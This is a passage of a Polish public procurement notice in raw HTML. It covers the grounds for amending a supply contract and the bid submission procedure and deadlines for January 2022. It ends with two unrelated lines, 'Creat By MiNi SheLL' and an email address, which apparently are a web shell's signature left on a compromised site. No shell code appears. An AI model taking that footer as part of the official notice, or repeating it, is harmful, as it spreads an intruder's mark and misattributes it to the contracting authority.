publicznych.<br/>2.	Dopuszcza się zmiany umowy w zakresie, o którym mowa w art. 455 ust.1 pkt 2-4 i ust. 2 ustawy Prawo zamówień publicznych.<br/>3.	Zgodnie z art. 455 ust 1 pkt 1 ustawy Prawo zamówień publicznych strony przewidują możliwość zmian umowy w następujących przypadkach:<br/>1)	zmiany wynagrodzenia Wykonawcy (w tym cen jednostkowych) brutto, przypadku:<br/>a)	zmiany przepisów obowiązujących dot. podatku VAT,<br/>b)	zmiany cen jednostkowych określonego produktu w sytuacji zmian cen na rynku. Niniejsza zmiana może nastąpić nie częściej niż raz na kwartał i w wysokości nie wyższej niż o wskaźnik zmiany cen towarów i usług konsumpcyjnych za poprzedni kwartał publikowany w Monitorze Polskim (tzw. klauzula waloryzacyjna). W takim przypadku ceny zostaną zmienione z pierwszym dniem miesiąca następującego po miesiącu, w którym złożono pismo wnioskujące o zmianę;<br/>2)	zmiany nazwy produktu (producenta) pod warunkiem zaoferowania produktów nie gorszych jakościowo od dotychczas dostarczanych przy jednoczesnym zachowaniu dotychczasowych lub niższych cen jednostkowych. Niniejsza zmiana może nastąpić w przypadku:<br/>a)	zaprzestania produkcji danego asortymentu przez producenta,<br/>b)	zmiany gramatury danej pozycji asortymentowej przez producenta produktu,<br/>c)	niedostępności produktu na rynku powyżej 14 dni kalendarzowych,<br/>3)	zmiany miejsca dostawy, w przypadku zmian organizacyjnych u Zamawiającego;<br/>4)	zmiany podwykonawcy i/lub części wykonywanego przez niego zakresu dostawy bądź wprowadzenie nowego podwykonawcy,<br/>5)	zmiany postanowień umowy, których konieczność wprowadzenia jest wynikiem zmian obowiązującego prawa bądź działań organów państwowych, samorządowych, sądowych lub administracyjnych,<br/>6)	zmiany terminu wykonania przedmiotu umowy, jeżeli dochowanie terminu określonego w umowie jest niemożliwe z uwagi na siłę wyższą lub inne okoliczności niezależne od Wykonawcy lub których Wykonawca przy zachowaniu należytej staranności nie był w stanie uniknąć lub przewidzieć, jak również inne przeszkody lub utrudnienia w wykonywaniu przedmiotu umowy spowodowane przez osoby trzecie,<br/>7)	zmiany postanowień umowny w uzasadnionych przypadkach, innych niż wyżej opisanych, gdy zachodzi konieczność ich wprowadzenia z powodu okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.<br/>4.	Dokonanie zmiany umowy wymaga uprzedniego złożenia na piśmie drugiej Stronie wniosku wykazującego zasadność wprowadzenia zmian i zgody Stron na jej dokonanie. Wniosek, o który mowa powyżej winien zawierać w szczególności:<br/>1)	propozycję (zakres) zmiany;<br/>2)	opis okoliczności faktycznych uprawniających do dokonania zmiany;<br/>3)	podstawę dokonania zmiany z niniejszej umowy;<br/>4)	informację lub dowody potwierdzające, że zostały spełnione okoliczności uzasadniające dokonanie zmiany.<br/>5.	Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie wniosku wykazującego zasadność wprowadzenia zmian i zgody stron na jej dokonanie.<br/>6.	Wszelkie zmiany umowy wymagają – pod rygorem nieważności – zachowania formy pisemnej w postaci aneksu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Wykonawca składa ofertę/ za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu. Klucz publiczny niezbędny do zaszyfrowania oferty przez Wykonawcę jest dostępny dla wykonawców na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-14 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-09</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com